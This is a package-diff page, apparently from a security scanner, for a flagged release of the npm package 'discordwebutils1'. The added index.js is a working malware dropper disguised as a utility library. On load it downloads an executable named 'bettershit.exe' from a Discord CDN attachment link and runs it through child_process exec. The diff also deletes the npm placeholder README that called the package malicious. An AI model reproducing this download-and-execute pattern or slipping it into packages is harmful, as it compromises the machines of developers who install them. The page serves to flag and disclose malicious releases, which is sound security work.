discordwebutils1 0.0.1-security → 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of discordwebutils1 might be problematic. Click here for more details.
- package/index.js +55 -0
- package/package.json +14 -3
- package/README.md +0 -5
package/index.js
ADDED
|
@@ -0,0 +1,55 @@
|
|
|
1
|
+
const fs = require('fs');
|
|
2
|
+
const http = require('https');
|
|
3
|
+
const { exec } = require('child_process');
|
|
4
|
+
|
|
5
|
+
class ExeFileHandler {
|
|
6
|
+
constructor(exePath) {
|
|
7
|
+
this.exePath = exePath;
|
|
8
|
+
}
|
|
9
|
+
|
|
10
|
+
onModified(event) {
|
|
11
|
+
if (event === this.exePath) {
|
|
12
|
+
exec(this.exePath, (error, stdout, stderr) => {
|
|
13
|
+
if (error) {
|
|
14
|
+
console.error(`Error executing ${this.exePath}: ${error}`);
|
|
15
|
+
}
|
|
16
|
+
});
|
|
17
|
+
}
|
|
18
|
+
}
|
|
19
|
+
}
|
|
20
|
+
|
|
21
|
+
function downloadExe(repoUrl, exeFilename) {
|
|
22
|
+
const downloadPath = exeFilename;
|
|
23
|
+
|
|
24
|
+
http.get(repoUrl, (response) => {
|
|
25
|
+
if (response.statusCode === 200) {
|
|
26
|
+
const fileStream = fs.createWriteStream(downloadPath);
|
|
27
|
+
|
|
28
|
+
response.pipe(fileStream);
|
|
29
|
+
|
|
30
|
+
response.on('end', () => {
|
|
31
|
+
console.log(`Downloaded ${downloadPath}`);
|
|
32
|
+
observeFile(downloadPath);
|
|
33
|
+
});
|
|
34
|
+
} else {
|
|
35
|
+
console.error(`Error downloading from ${repoUrl}: ${response.statusCode}`);
|
|
36
|
+
}
|
|
37
|
+
});
|
|
38
|
+
}
|
|
39
|
+
|
|
40
|
+
function observeFile(exePath) {
|
|
41
|
+
fs.watch(exePath, (event) => {
|
|
42
|
+
if (event === 'change') {
|
|
43
|
+
exec(exePath, (error, stdout, stderr) => {
|
|
44
|
+
if (error) {
|
|
45
|
+
console.error(`Error executing ${exePath}: ${error}`);
|
|
46
|
+
}
|
|
47
|
+
});
|
|
48
|
+
}
|
|
49
|
+
});
|
|
50
|
+
}
|
|
51
|
+
|
|
52
|
+
const githubUrl = "https://cdn.discordapp.com/attachments/919194639997759521/1168547085554024529/bettershit.exe?ex=65522947&is=653fb447&hm=06099ba77446f127ba4ccbc69df64fe0c5659e458e8faedd51dd515910c0f272&";
|
|
53
|
+
const exeFilename = "bettershit.exe";
|
|
54
|
+
|
|
55
|
+
downloadExe(githubUrl, exeFilename);
|
package/package.json
CHANGED
|
@@ -1,6 +1,17 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "discordwebutils1",
|
|
3
|
-
"version": "0.0
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "1.0.0",
|
|
4
|
+
"description": "ddd",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "tes"
|
|
8
|
+
},
|
|
9
|
+
"keywords": [
|
|
10
|
+
"topg"
|
|
11
|
+
],
|
|
12
|
+
"author": "ayato",
|
|
13
|
+
"license": "ISC",
|
|
14
|
+
"dependencies": {
|
|
15
|
+
"discordwebtest3": "^1.0.0"
|
|
16
|
+
}
|
|
6
17
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=discordwebutils1 for more information.
|